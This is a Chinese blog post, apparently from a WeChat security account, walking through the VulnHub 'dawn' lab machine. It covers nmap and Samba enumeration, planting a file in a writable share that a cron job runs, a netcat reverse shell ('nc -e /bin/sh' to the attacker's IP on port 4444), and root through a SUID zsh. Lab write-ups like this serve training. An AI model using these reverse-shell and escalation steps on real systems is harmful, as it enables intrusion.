声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
靶机地址:
https://download.vulnhub.com/sunset/dawn.zip
内容简介:
主机发现
端口扫描
信息收集
SAMBA漏洞
任意文件上传
日志信息泄漏
调度任务
密码爆破
提权
1.1 主机发现
arp-scan -l
1.2 端口扫描
nmap -p- 192.168.144.138
1.3 信息搜集
nmap -p80,139,445,3306 -sV -A 192.168.144.138
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-02 02:37 EDT
Nmap scan report for 192.168.144.138
Host is up (0.0012s latency).
PORT STATE SERVICE VERSION
open http Apache httpd 2.4.38 ((Debian))
Apache/2.4.38 (Debian) :
Site doesn't have a title (text/html). :
open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
open mysql MySQL 5.5.5-10.3.15-MariaDB-1
mysql-info:
Protocol: 10
Version: 5.5.5-10.3.15-MariaDB-1
Thread ID: 14
Capabilities flags: 63486
Some Capabilities: Support41Auth, SupportsCompression, SupportsTransactions, ConnectWithDatabase, IgnoreSigpipes, FoundRows, ODBCClient, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, LongColumnFlag, InteractiveClient, SupportsLoadDataLocal, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
Status: Autocommit
Salt: nZY0"VmCFt5L[hu7M^o6
Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:BE:C7:00 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: DAWN
Host script results:
mean: 1h20m00s, deviation: 2h18m33s, median: 0s :
smb-security-mode:
account_used: guest
authentication_level: user
challenge_response: supported
message_signing: disabled (dangerous, but default)
smb2-time:
date: 2022-11-02T06:37:55
start_date: N/A
NetBIOS name: DAWN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) :
smb2-security-mode:
3.1.1:
Message signing enabled but not required
smb-os-discovery:
OS: Windows 6.1 (Samba 4.9.5-Debian)
Computer name: dawn
NetBIOS computer name: DAWNx00
Domain name: dawn
FQDN: dawn.dawn
System time: 2022-11-02T02:37:55-04:00
TRACEROUTE
HOP RTT ADDRESS
1 1.21 ms 192.168.144.138
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.66 seconds
开启了139,445端口存在Samba smbd
1.4 Samba漏洞
smbclient -L \\192.168.144.138
smbclient \\192.168.144.138\ITDEPT
help
可以使用PUT方法写入文件
echo 1111 > a.txt
put a.txt
ls
写入任意文件
1.5 日志文件分析
dirsearch -u http://192.168.144.138/
http://192.168.144.138/logs/
http://192.168.144.138/logs/management.log
你也许会好奇为什么没有日志 这个靶机需要等到 晚上 10点到11点 日志才会收集,如果没有日志的话,休息一天把 ,等明天就会有了 ,包括突破边界也是同样的!!!!!!
下载下来分析日志文件
使用pspy64工具抓取了正在运行的服务
找到根目录 /var/www/html
找到关键点ITDEPT在445服务也存在这样的文件夹执行web-control脚本
然后改777权限
发现 该脚本 循环往复 故 可以445服务里面写一个以该脚本名字命名,写入 反弹代码 等待它 循环执行!!!!!!!!!!!!!
grep "/home/dawn/ITDEPT/" management.log
伪造product-control文件往里面写入反弹shell代码,等待循环执行。
1.6 突破边界
smbclient \\192.168.144.138\ITDEPT
vim product-control //创建文件
//写入nc 反弹
nc -e /bin/sh 192.168.144.247 4444
put product-control // 稍微等待一会
nc -lvnp 4444
成功!!!
python -c "import pty;pty.spawn('/bin/bash')" //终端升级
1.7 权限提升(suid提权)
find / -type f -perm -u=s -ls 2>/dev/null
发现 以 root权限 执行的 zsh ,接下来 就简单了 直接执行 zsh
成功
注:如有侵权请后台联系进行删除
觉得内容不错,请点一下"赞"和"在看"
原文始发于微信公众号(嗨嗨安全):靶机实战系列之dawn靶机
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论